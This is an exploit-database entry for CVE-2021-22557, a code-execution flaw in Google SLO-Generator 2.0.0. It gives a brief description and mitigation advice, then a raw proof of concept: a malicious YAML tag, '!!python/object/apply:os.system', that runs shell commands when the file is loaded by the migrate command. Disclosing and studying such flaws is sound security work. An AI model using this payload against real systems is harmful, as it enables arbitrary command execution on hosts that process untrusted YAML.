Google SLO-Generator 2.0.0 - Code Execution

vendor:

SLO-Generator

by:

Kiran Ghimire

7.8

CVSS

HIGH

Code Execution

CWE

Product Name: SLO-Generator

Affected Version From: <= 2.0.0

Affected Version To:

Patch Exists: NO

Related CWE: CVE-2021-22557

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2021

Google SLO-Generator 2.0.0 – Code Execution

The Google SLO-Generator version 2.0.0 is vulnerable to code execution. This can be exploited by an attacker by crafting a specially crafted YAML file that contains malicious code. When this file is processed by the SLO-Generator, it will execute the code within the 'apply:os.system' field. This allows an attacker to execute arbitrary commands on the host system.

Mitigation:

To mitigate this vulnerability, users are advised to update to a version of the SLO-Generator that is not affected by this issue. It is recommended to always use the latest stable release of the software and to follow best practices for secure configuration and deployment.

Source

Exploit-DB raw data:

# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.

##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
   !!python/object/apply:os.system ["id;whoami"]
3.  Run the below command
   slo-generator migrate -b exploit.yaml
##############################################################################